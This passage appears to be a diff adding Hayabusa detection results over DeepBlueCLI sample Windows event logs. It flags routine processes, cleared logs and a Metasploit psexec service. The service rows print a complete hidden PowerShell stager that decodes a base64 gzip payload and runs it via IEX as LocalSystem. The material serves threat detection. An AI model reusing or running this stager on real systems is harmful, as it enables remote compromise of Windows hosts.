+2016-09-20 22:07:44.179 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6e8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 22:07:44.757 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 22:07:58.039 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x9a0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 22:07:58.101 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 22:07:59.540 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb84 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 22:08:00.110 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xc1c | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 22:08:00.615 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xc38 | User: IEUser | LID: 0x6793c,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 22:08:01.982 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc5c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 22:10:32.160 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 22:20:59.082 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -responsepester | Path: C:\Windows\System32\rundll32.exe | PID: 0x87c | User: IEUser | LID: 0x6796c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 22:25:15.535 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 23:02:21.413 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x11c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 23:02:21.475 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x720 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 23:03:25.976 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x824 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 23:03:26.007 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-20 23:54:49.500 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations | Path: C:\Windows\System32\rundll32.exe | PID: 0xc60 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-21 00:10:43.213 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x72c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-21 00:10:56.112 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-21 00:10:56.268 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xaf4 | User: IEUser | LID: 0x6796c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-21 00:10:56.315 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xad8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-21 00:10:56.331 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa30 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-21 00:10:56.346 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1a8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-21 00:10:56.377 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xd08 | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-21 00:45:12.871 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb34 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-21 00:45:18.574 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8d4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-21 00:45:25.147 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x270 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-21 00:46:27.941 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc90 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-21 00:46:32.738 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-21 01:33:53.404 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-security.evtx
+2016-09-21 01:34:04.272 +09:00,IE10Win7,104,high,Evas,System Log File Cleared,User: IEUser,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
+2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: UWdKhYTIQWWJxHfx | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
+2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: UWdKhYTIQWWJxHfx | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
+2016-09-21 01:35:46.590 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: UWdKhYTIQWWJxHfx | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAGFl4VcCA71WW4/aOhB+bqX+h6hCIlFZEli6N6nScYAAy2Vhw52iI5M4weDEbOJw6+l/PxMge2m31Z4+nAgU2zPjGX/zjSdO5FuCcl+aF8YW77iE9KRvH96/a+MAe5Kcmq0rV5uutY5mopKRUq6rcU625Yd6V3n3DvRS++uRJ32R5AlarUrcw9Sf3twUoyAgvjjOsxUiUBgSb8YoCWVF+kcazElAzu5mC2IJ6ZuU+jtbYXyG2UltV8TWnEhnyLdjWYNbOI4xa64YFXL669e0MjnLTbPlhwizUE6bu1AQL2szllak70rssLtbETndpFbAQ+6I7ID65/lszw+xQ1qw25o0iZhzO0wrcAr4BUREgS8dzhNvcBTLaRi2A24h2w5ICNrZmr/mSyKn/IixjPSXPDl5v498QT0CckECvjJJsKYWCbNV7NuM3BNnKrfIJjn0W43k50ag1RaBkoG8vBJmk9sRI0fLtPJzoC9yqcDzQz4BiO8f3n947ySU8C6CVWtPLxcbhJ+TAkbvJocxgajlNg/pQf+LpGWkJvjHggc7mKa6QUSUqTSJszGZTqWUPeyagdjVM7/eI5cYgPreEMM1h8VJn1N7CkanbKUs9hB7+A3rSsShPintfOxRKyGW/FoOiMPI4cTZRK0FYcnpk4DYJcKIi0WMakaa/GxW9qh4tNUjymwSIAvyGEJUkGLlZTDHRMnpmt8kHiB1nKchHQ7QmSTaJwrvEu/xHJTSRYbDMCO1I6gnKyOZBDNiZyTkh/QkQpHgh2H6KdxmxAS1cCiS7aZKguPJX5H7oQgiC5IHZ++aK2JRzGIoMlKV2kTfmdRN/KZfBaKIGaO+CzutIRGwEgNgipgSAYT4mH4laxJR81aMeKB3KG6DYRdK+VQQBx5hl9jpH6NMCH9kd4xHAsSzGCHJJuMiI/VpIOCOiLE9cunPg3h2RxzCKQbklBQ5qZyJvhMxz1MMF+dHfp4wOiASCEDDCLin45BcFEwRAFbyR/WOFhE8o5rPmpa+pDm0oblaE/49el7jpUu7fruoqkFpO3dQLaw1q+1Sp1otrG/NfkGY5Zqot2uiWR4uFiaq3vdGYlxD1S7VlqPCfnVL92YD2aOterHX9xtN3+4Xru2MSo7jXjrmfe6zQRuDYkfX8rhRKkeNgb7RtUJYpptqh/Y6y1tDzEZ9hnuO6g5z15huG8Gin+PNfQ2hyvzc2t86/cq8ae9GVfV6UFiiMkJFv9w3dF4f6QFqq33s9vmmvqiwgVtEumFRMu70DL3TMXTUqyweSteqC7ZDPNcH/Twdr4b3c5gbEEJd1Qo1m+z5qAMgVTjC7j3ouMW8NXdAp/QJ6Z9aPMzjpc6RDjrG+AHiGq2MNgN5t5fnqM9aQ4wa452hqrlRu4CqGh1UXBRviV29g1G4Lu1Laq5vc3vwuTVy1P6QXaqlYndlOaqqbqqlujXOba/uLgu69lD0qMdmeVu97l3p/qbutteu3Rlc3m9buxn466lq/2PMGqBNavHZu9IuF8/o8Ktrv4mDcI4Z0ATu86RQDR4Ypyu5zWlsIcvPuvWSBD5h0Nyg/SV8R4xxK+4TL65w6FXHDjKF4u3B8Dz/6kiRHhWVpz6SLN3cjCFmqKMjybMN4rtintG255oG97+2LWhw8LeftMhXO/m0WSbuIAleTy7YwYUSl1hqMdg0L5bV1f+B5qnE5/Cy34rm09pvpG9CWMs8IvGT5OXCf8L7D7EYYCpA34Qri5FjA/09JCcuPfsQSVIHXHFOT/wxeBeJsxZ8o/wLs66tlosKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-powershell-target-system.evtx
+2016-09-21 01:35:46.605 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 